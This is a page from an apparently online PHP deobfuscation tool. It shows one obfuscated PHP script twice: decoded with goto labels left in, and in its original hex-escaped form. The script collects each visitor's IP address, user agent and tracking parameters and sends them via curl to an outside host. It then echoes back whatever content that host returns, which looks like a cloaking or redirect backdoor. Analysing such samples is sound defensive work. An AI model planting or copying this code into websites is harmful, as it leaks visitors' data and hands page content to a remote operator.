Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto V8pnS; w1lF3: foreach ($_GET as $key => $value) { $aff_sub4 = $value; break; ..
Decoded Output download
<?php
goto V8pnS; w1lF3: foreach ($_GET as $key => $value) { $aff_sub4 = $value; break; } goto XbXoG; ic4wf: $ch = curl_init(); goto i0oGC; XbXoG: if (isset($_REQUEST["utm_sor"]) && $_REQUEST["utm_sor"] != '') { $aff_sub3 = $_REQUEST["utm_sor"]; } goto Cw4x3; jZ_Nd: $cmp_id = ''; goto hEL9l; i0oGC: curl_setopt_array($ch, array(CURLOPT_URL => $curl_url, CURLOPT_RETURNTRANSFER => true, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => true)); goto exw91; MGWnC: $client_ip = $_SERVER["REMOTE_ADDR"]; goto AtMRr; VHutI: $url = ''; goto taI_d; lvTZq: $user_agent = $_SERVER["HTTP_USER_AGENT"]; goto OZc89; mFqHF: if (isset($_REQUEST["offer_id"]) && $_REQUEST["offer_id"] != '') { $offer_id = $_REQUEST["offer_id"]; } goto WoqCm; FoPRl: if (isset($_REQUEST["utm_source"]) && $_REQUEST["utm_source"] != '') { $aff_sub4 = $_REQUEST["utm_source"]; } goto w1lF3; G4D7L: if (isset($_REQUEST["utm_cmp"]) && $_REQUEST["utm_cmp"] != '') { $aff_sub4 = $_REQUEST["utm_cmp"]; } goto FoPRl; x9eG2: $client_ip = $_SERVER["REMOTE_ADDR"]; goto lvTZq; exw91: $output = curl_exec($ch); goto fVGHC; V8pnS: $report = ''; goto Lu9_K; OMbQt: if (isset($_REQUEST["sumcheck"]) && $_REQUEST["sumcheck"] != '') { $aff_sub4 = $_REQUEST["sumcheck"]; } goto mFqHF; taI_d: $em_id = ''; goto DpZlf; a55jb: die; goto mNwjv; yuQPf: $report = "https://investingnews.space/action"; goto yMn3P; Cw4x3: if (isset($_REQUEST["transaction_id"]) && $_REQUEST["transaction_id"] != '') { $aff_sub4 = $_REQUEST["transaction_id"]; } goto OMbQt; DpZlf: $d = ''; goto M_RYL; oeWyv: if (isset($_REQUEST["aff_id"]) && $_REQUEST["aff_id"] != '') { $aff_id = $_REQUEST["aff_id"]; } goto DUK0b; M_RYL: $redirect = ''; goto x9eG2; hEL9l: $offer_id = ''; goto VHutI; WoqCm: if (isset($_REQUEST["pid"]) && $_REQUEST["pid"] != '') { $aff_id = $_REQUEST["pid"]; } goto oeWyv; DUK0b: if (isset($_SERVER["HTTP_X_FORWARDED_FOR"])) { $_SERVER["REMOTE_ADDR"] = $_SERVER["HTTP_X_FORWARDED_FOR"]; unset($GLOBALS["_SERVER"]["HTTP_X_FORWARDED_FOR"]); if (isset($_SERVER["HTTP_CLIENT_IP"])) { unset($GLOBALS["_SERVER"]["HTTP_CLIENT_IP"]); } } else { if (isset($_SERVER["HTTP_CF_CONNECTING_IP"])) { $_SERVER["REMOTE_ADDR"] = $_SERVER["HTTP_CF_CONNECTING_IP"]; unset($GLOBALS["_SERVER"]["HTTP_CF_CONNECTING_IP"]); } } goto MGWnC; OZc89: if (isset($_REQUEST["ignore"])) { echo "ok"; die; } goto yuQPf; AtMRr: $curl_url = trim($report) . "?action=10&external=" . trim($aff_sub4) . "&client_ip=" . trim($client_ip) . "&d=" . trim($d) . "&user_agent=" . str_replace(" ", '', $user_agent) . ''; goto ic4wf; fVGHC: curl_close($ch); goto fl94P; yMn3P: if (isset($_REQUEST["em_id"]) && $_REQUEST["em_id"] != '') { $em_id = $_REQUEST["em_id"]; } goto G4D7L; Lu9_K: $action = ''; goto jZ_Nd; fl94P: echo $output; goto a55jb; mNwjv: ?>
Did this file decode correctly?
Original Code
<?php
goto V8pnS; w1lF3: foreach ($_GET as $key => $value) { $aff_sub4 = $value; break; } goto XbXoG; ic4wf: $ch = curl_init(); goto i0oGC; XbXoG: if (isset($_REQUEST["\x75\164\155\137\x73\x6f\162"]) && $_REQUEST["\x75\164\155\x5f\163\157\x72"] != '') { $aff_sub3 = $_REQUEST["\x75\x74\155\x5f\163\157\162"]; } goto Cw4x3; jZ_Nd: $cmp_id = ''; goto hEL9l; i0oGC: curl_setopt_array($ch, array(CURLOPT_URL => $curl_url, CURLOPT_RETURNTRANSFER => true, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => true)); goto exw91; MGWnC: $client_ip = $_SERVER["\x52\x45\115\117\x54\x45\x5f\101\104\x44\x52"]; goto AtMRr; VHutI: $url = ''; goto taI_d; lvTZq: $user_agent = $_SERVER["\x48\x54\x54\x50\137\125\x53\x45\122\137\x41\x47\x45\x4e\x54"]; goto OZc89; mFqHF: if (isset($_REQUEST["\157\146\x66\x65\162\137\151\x64"]) && $_REQUEST["\157\x66\146\145\162\137\x69\x64"] != '') { $offer_id = $_REQUEST["\x6f\146\x66\x65\x72\x5f\x69\144"]; } goto WoqCm; FoPRl: if (isset($_REQUEST["\165\164\155\137\x73\x6f\x75\162\143\x65"]) && $_REQUEST["\x75\x74\x6d\137\x73\x6f\x75\162\143\x65"] != '') { $aff_sub4 = $_REQUEST["\165\164\x6d\137\x73\x6f\x75\x72\x63\x65"]; } goto w1lF3; G4D7L: if (isset($_REQUEST["\x75\164\x6d\x5f\x63\x6d\160"]) && $_REQUEST["\x75\164\155\x5f\x63\x6d\160"] != '') { $aff_sub4 = $_REQUEST["\x75\164\155\x5f\143\155\x70"]; } goto FoPRl; x9eG2: $client_ip = $_SERVER["\122\x45\115\117\124\x45\137\x41\104\x44\122"]; goto lvTZq; exw91: $output = curl_exec($ch); goto fVGHC; V8pnS: $report = ''; goto Lu9_K; OMbQt: if (isset($_REQUEST["\163\165\155\x63\x68\145\x63\153"]) && $_REQUEST["\x73\165\x6d\x63\150\145\143\x6b"] != '') { $aff_sub4 = $_REQUEST["\x73\165\155\143\x68\145\x63\153"]; } goto mFqHF; taI_d: $em_id = ''; goto DpZlf; a55jb: die; goto mNwjv; yuQPf: $report = "\x68\164\x74\160\x73\x3a\x2f\x2f\151\156\166\x65\163\x74\151\156\x67\x6e\145\x77\x73\56\163\x70\141\x63\x65\57\141\143\164\x69\x6f\x6e"; goto yMn3P; Cw4x3: if (isset($_REQUEST["\164\162\141\156\x73\x61\x63\x74\x69\x6f\x6e\x5f\151\144"]) && $_REQUEST["\x74\x72\x61\x6e\x73\141\x63\x74\x69\x6f\x6e\x5f\151\144"] != '') { $aff_sub4 = $_REQUEST["\164\x72\141\156\163\141\143\164\x69\157\x6e\x5f\151\x64"]; } goto OMbQt; DpZlf: $d = ''; goto M_RYL; oeWyv: if (isset($_REQUEST["\141\x66\x66\137\151\x64"]) && $_REQUEST["\141\146\x66\137\151\144"] != '') { $aff_id = $_REQUEST["\141\146\146\137\x69\144"]; } goto DUK0b; M_RYL: $redirect = ''; goto x9eG2; hEL9l: $offer_id = ''; goto VHutI; WoqCm: if (isset($_REQUEST["\x70\151\144"]) && $_REQUEST["\160\x69\x64"] != '') { $aff_id = $_REQUEST["\160\151\x64"]; } goto oeWyv; DUK0b: if (isset($_SERVER["\x48\124\x54\120\137\130\x5f\x46\117\x52\x57\101\122\104\x45\x44\x5f\106\117\x52"])) { $_SERVER["\122\105\x4d\117\124\105\x5f\x41\x44\104\122"] = $_SERVER["\x48\x54\124\x50\x5f\x58\137\x46\117\122\x57\101\x52\x44\x45\x44\137\106\x4f\122"]; unset($GLOBALS["\x5f\123\105\122\126\105\x52"]["\110\x54\124\120\137\130\137\x46\x4f\x52\127\101\x52\x44\105\104\x5f\106\x4f\x52"]); if (isset($_SERVER["\x48\x54\x54\120\137\103\x4c\111\x45\x4e\124\x5f\111\x50"])) { unset($GLOBALS["\137\x53\x45\x52\126\105\122"]["\x48\124\x54\x50\137\x43\114\111\105\x4e\x54\137\111\x50"]); } } else { if (isset($_SERVER["\x48\124\x54\x50\x5f\103\x46\137\103\x4f\116\x4e\x45\103\124\111\x4e\107\137\111\x50"])) { $_SERVER["\x52\x45\115\x4f\x54\105\x5f\x41\x44\104\122"] = $_SERVER["\110\x54\x54\120\x5f\103\106\x5f\x43\117\116\116\x45\103\x54\x49\116\107\x5f\111\x50"]; unset($GLOBALS["\137\x53\105\x52\x56\105\x52"]["\110\x54\124\x50\137\103\x46\x5f\103\117\116\x4e\105\103\124\x49\x4e\x47\137\111\120"]); } } goto MGWnC; OZc89: if (isset($_REQUEST["\x69\147\156\x6f\162\x65"])) { echo "\157\153"; die; } goto yuQPf; AtMRr: $curl_url = trim($report) . "\x3f\x61\143\x74\x69\157\156\75\x31\x30\46\145\x78\164\145\x72\x6e\x61\x6c\75" . trim($aff_sub4) . "\x26\x63\154\x69\145\x6e\x74\x5f\x69\x70\x3d" . trim($client_ip) . "\46\x64\x3d" . trim($d) . "\46\x75\163\x65\162\137\141\147\145\x6e\164\x3d" . str_replace("\x20", '', $user_agent) . ''; goto ic4wf; fVGHC: curl_close($ch); goto fl94P; yMn3P: if (isset($_REQUEST["\x65\x6d\x5f\151\144"]) && $_REQUEST["\x65\155\x5f\151\144"] != '') { $em_id = $_REQUEST["\x65\155\x5f\151\x64"]; } goto G4D7L; Lu9_K: $action = ''; goto jZ_Nd; fl94P: echo $output; goto a55jb; mNwjv: ?>
Function Calls
None |
Stats
MD5 | b01b0f601403787952478536d8c70419 |
Eval Count | 0 |
Decode Time | 52 ms |